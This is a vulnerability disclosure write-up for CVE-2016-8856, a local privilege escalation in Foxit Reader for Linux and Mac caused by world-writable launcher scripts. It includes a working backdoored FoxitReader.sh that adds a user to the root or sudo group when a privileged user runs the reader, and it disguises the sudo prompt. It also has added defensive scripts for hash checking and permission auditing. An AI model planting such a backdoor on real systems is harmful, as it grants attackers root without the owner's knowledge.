(CVE-2016-8856) Foxit Reader for Linux and Mac: Local Privilege Escalation Writeup

tl;dr: I found a local privilege escalation bug in Foxit Reader for Mac and Linux. Random find, had to run ls -la to find this. The issue has been assigned CVE-2016-8856.

Introduction

Recently, I stumbled on a very simple bug in Foxit Reader for Mac and Linux (from here on, just Foxit Reader). The vulnerability was caused by improper file permissions granted to Foxit Reader's core files on Linux and Mac systems. An attacker with low-privileged access could have exploited this vulnerability to elevate their privileges, execute commands as a higher-privileged user, or both.

The versions affected were:

  • Foxit Reader for Mac 2.1.0.0804 and earlier
  • Foxit Reader for Linux 2.1.0.0805 and earlier

A fixed version has been released and a security bulletin is published here - https://www.foxitsoftware.com/support/security-bulletins.php.

About the bug:

The issue is caused by the way Foxit Reader installs itself on a Linux/Mac machine. At installation time, the user is given a choice of where to install Foxit. The default installation locations are:

  • On Linux
    • sudo or root user - /opt/
    • normal user - ~/opt/
  • On Mac
    • /Applications/Foxit Reader.app/

The issue exists in the file permissions assigned to the installed files. The installer assigns "rwxrwxrwx" (0777) permissions to most of the files in the installation folder. Among these files, the more important ones are:

  • FoxitReader.sh and updater.sh on Linux (tested on Debian 8 Jessie)
  • FoxitReader and updater.app/Contents/MacOS/updater on OS X (tested on Yosemite)

These files are used to launch Foxit Reader and to update it, respectively. Since these files are world-writable, any logged-in user with limited privileges can write to them. After that, whenever a privileged user opens the Foxit Reader application, the attacker's custom code runs.

Reproduction/ Exploit Example

The steps described below show how the vulnerability could be exploited on a Linux-based OS. We have tested this on Debian 8.

  1. Search for the Foxit Reader installation on the system. If it is not found in the default locations mentioned above, you can use the following command to search for it:

find / -iname foxit\* 2> /dev/null

  2. Go to the installation folder, generally foxitsoftware/foxitreader/.
  3. Open FoxitReader.sh and replace its content with this:

#!/bin/bash
appname="FoxitReader"
selfpath="/opt/foxitsoftware/foxitreader"
LD_LIBRARY_PATH=$selfpath/lib:$selfpath/platforms:$selfpath/printsupport:$selfpath/rmssdk:$selfpath/sensors:$selfpath/imageformats:$selfpath/platforminputcontexts:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH

# Backdoor starts from here
if [ "$(id | grep root | wc -l)" == 1 ]
then
    adduser temp root
elif [ "$(groups | grep sudo | wc -l)" == 1 ]
then
    gksudo -- bash -c 'foxit_command_which_does_not_exist_but_hides_our_original_command 2> /dev/null; sudo adduser temp sudo;'
fi
# Backdoor ends
# Launch the real Foxit Reader binary with the original arguments
exec "$selfpath/$appname" "$@"

  4. Wait for a root/sudo user to open Foxit Reader.
  5. ???
  6. Profit.
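Turning the steps above into a defender's check: the script below is an added example, not part of the original post or of Foxit's own code. It records a SHA-256 baseline of the launcher scripts in an install directory and later verifies that each one is unchanged and is not writable by group or others, which is exactly the condition the steps above rely on. The temporary directory, the demo copies of FoxitReader.sh and updater.sh inside it, and the function names are constructed for the demo; point record_baseline and verify_launchers at a real install path such as /opt/foxitsoftware/foxitreader to use them.

```shell
#!/bin/sh
# Added example (not from the original post): baseline and verify launcher
# scripts so that a world-writable, edited FoxitReader.sh is caught before a
# privileged user runs it. All paths below are constructed for the demo.

# Print the SHA-256 hex digest of a file (sha256sum on Linux, shasum on macOS).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Emit "<hash>  <path>" for every .sh launcher under the directory $1.
# Run this once on a freshly installed, correctly permissioned tree.
record_baseline() {
    find "$1" -type f -name '*.sh' | sort | while read -r f; do
        printf '%s  %s\n' "$(sha256_of "$f")" "$f"
    done
}

# Check every launcher listed in the baseline file $1. Prints one line per
# finding (MISSING, WRITABLE, MODIFIED) and returns 0 only if all are clean.
verify_launchers() {
    baseline=$1; status=0
    while read -r hash path; do
        [ -n "$path" ] || continue
        if [ ! -f "$path" ]; then
            echo "MISSING  $path"; status=1; continue
        fi
        # A launcher run by other users must be writable only by its owner:
        # flag the "other write" bit (the post's 0777 case) and "group write".
        if [ -n "$(find "$path" \( -perm -0002 -o -perm -0020 \) -print 2>/dev/null)" ]; then
            echo "WRITABLE $path"; status=1
        fi
        # Content differs from the install-time baseline.
        if [ "$(sha256_of "$path")" != "$hash" ]; then
            echo "MODIFIED $path"; status=1
        fi
    done < "$baseline"
    return $status
}

# Constructed demo install tree: two harmless launchers with sane permissions.
demo_tree() {
    root=$(mktemp -d)
    printf '#!/bin/sh\nexec /bin/true "$@"\n' > "$root/FoxitReader.sh"
    printf '#!/bin/sh\nexec /bin/true\n' > "$root/updater.sh"
    chmod 0755 "$root/FoxitReader.sh" "$root/updater.sh"
    echo "$root"
}

demo() {
    root=$(demo_tree)
    record_baseline "$root" > "$root/baseline.txt"
    echo "clean install:"
    verify_launchers "$root/baseline.txt" && echo "  OK"
    # Simulate the post's scenario: the launcher is 0777 and gets edited.
    chmod 0777 "$root/FoxitReader.sh"
    echo '# tampered' >> "$root/FoxitReader.sh"
    echo "after tampering:"
    verify_launchers "$root/baseline.txt" || echo "  launcher must not be trusted"
    rm -rf "$root"
}
demo
```

The baseline file itself must live somewhere the low-privileged user cannot write (for example a root-owned directory), otherwise an attacker who edits the launcher can simply re-record the hash.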

CVSS

CVSS v3 Base Score: 7.8 High
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

18-09-2016 Vendor notified about the bug.
19-09-2016 Vendor replies they are looking into the issue.
28-09-2016 Vendor confirms and fixes the bug.
18-10-2016 New version with fix released. Applied for CVE.
19-10-2016 CVE-2016-8856 assigned to the vulnerability.

Takeaway

Always make sure that files on your system have only the permissions they require. Don't be that guy who chmod's 777 on every file. Another issue is files with the SUID/SGID bit set, but that is a topic for another day/blog post.

Also, to search for world-writable files on your system, run the following command:

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
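The find command above lists world-writable directories that lack the sticky bit. The added script below, which is not from the original post, extends that check to the files this post is about: it lists world-writable regular files and non-sticky directories under a given path and then strips the "other write" bit from everything it finds, reporting how many entries it changed. The demo tree (a foxitreader folder holding 0777 copies of FoxitReader.sh and updater.sh and a 0777 lib directory) and the function names are constructed; run the functions against a real install directory such as /opt/foxitsoftware/foxitreader to audit it.

```shell
#!/bin/sh
# Added example (not from the original post): audit an install tree for
# world-writable files and directories, then remove the "other write" bit.
# The demo tree built by make_demo_tree is constructed for illustration.

# World-writable regular files under $1. These are the dangerous ones: a
# launcher script anyone can edit runs as whoever launches it.
find_ww_files() {
    find "$1" -xdev -type f -perm -0002 -print 2>/dev/null | sort
}

# World-writable directories under $1 without the sticky bit. Sticky dirs
# such as /tmp are expected; a non-sticky one lets any user rename or
# replace the files inside it.
find_ww_dirs() {
    find "$1" -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null | sort
}

# Strip the "other write" bit from everything world-writable under $1 and
# print the number of entries that were changed.
harden_tree() {
    before=$(find "$1" -xdev -perm -0002 -print 2>/dev/null | wc -l | tr -d ' ')
    find "$1" -xdev -perm -0002 -exec chmod o-w {} + 2>/dev/null
    echo "$before"
}

# Constructed demo tree mirroring the post's layout: two 0777 launcher
# scripts and a 0777 lib directory next to a correctly permissioned library.
make_demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/foxitreader/lib"
    chmod 0755 "$root/foxitreader"
    printf '#!/bin/sh\nexec /bin/true\n' > "$root/foxitreader/FoxitReader.sh"
    printf '#!/bin/sh\nexec /bin/true\n' > "$root/foxitreader/updater.sh"
    : > "$root/foxitreader/lib/libdemo.so"
    chmod 0777 "$root/foxitreader/FoxitReader.sh" "$root/foxitreader/updater.sh"
    chmod 0777 "$root/foxitreader/lib"
    chmod 0755 "$root/foxitreader/lib/libdemo.so"
    echo "$root"
}

demo() {
    root=$(make_demo_tree)
    echo "World-writable files:"
    find_ww_files "$root"
    echo "World-writable, non-sticky directories:"
    find_ww_dirs "$root"
    echo "Fixed $(harden_tree "$root") entries"
    echo "Remaining world-writable files: $(find_ww_files "$root" | wc -l | tr -d ' ')"
    rm -rf "$root"
}
demo
```

harden_tree only removes the bit that lets everyone write; it does not touch group permissions or ownership, so review the output of find_ww_files before and after rather than treating the count alone as proof that the tree is safe.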

Source <- An excellent resource for Linux privilege escalation basics.

Kudos to Foxit's Security Team for prompt acknowledgement and fix.